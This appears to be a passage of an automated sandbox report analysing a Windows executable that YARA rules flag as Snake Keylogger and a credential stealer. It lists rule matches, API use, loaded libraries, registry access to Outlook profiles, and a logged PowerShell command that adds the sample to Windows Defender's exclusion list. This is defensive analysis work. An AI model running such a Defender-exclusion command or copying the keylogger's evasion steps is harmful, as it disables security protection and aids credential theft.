Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFD999	6_2_06DFD999
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFD9A8	6_2_06DFD9A8
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFD550	6_2_06DFD550
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF9543	6_2_06DF9543
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DFD540	6_2_06DFD540

Source: VbcXXnmIwPPhh.exe, 00000000.00000000.1255275199.0000000000F0A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamegeWD.exeD vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1268385420.00000000032C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1266065314.00000000015BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1283325923.0000000007D2F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1282208749.0000000007730000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3728527291.00000000073D9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe, 00000006.00000002.3715386141.0000000000446000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs VbcXXnmIwPPhh.exe
Source: VbcXXnmIwPPhh.exe	Binary or memory string: OriginalFilenamegeWD.exeD vs VbcXXnmIwPPhh.exe

Source: VbcXXnmIwPPhh.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.VbcXXnmIwPPhh.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.3715386141.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1270613564.0000000004279000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 6212, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: VbcXXnmIwPPhh.exe PID: 4888, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: VbcXXnmIwPPhh.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.44a56e0.4.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, COVID19.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.VbcXXnmIwPPhh.exe.430a080.6.raw.unpack, VIPSeassion.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, HBDxB2GmiOduxajCiD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, HBDxB2GmiOduxajCiD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs	Security API names: _0020.SetAccessControl
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs	Security API names: _0020.AddAccessRule
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs	Security API names: _0020.SetAccessControl
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/9@4/4

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VbcXXnmIwPPhh.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xqyadvx.hmn.ps1

Jump to behavior

Source: VbcXXnmIwPPhh.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: VbcXXnmIwPPhh.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process created: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe "C:\Users\user\Desktop\VbcXXnmIwPPhh.exe"	Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: VbcXXnmIwPPhh.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: VbcXXnmIwPPhh.exe

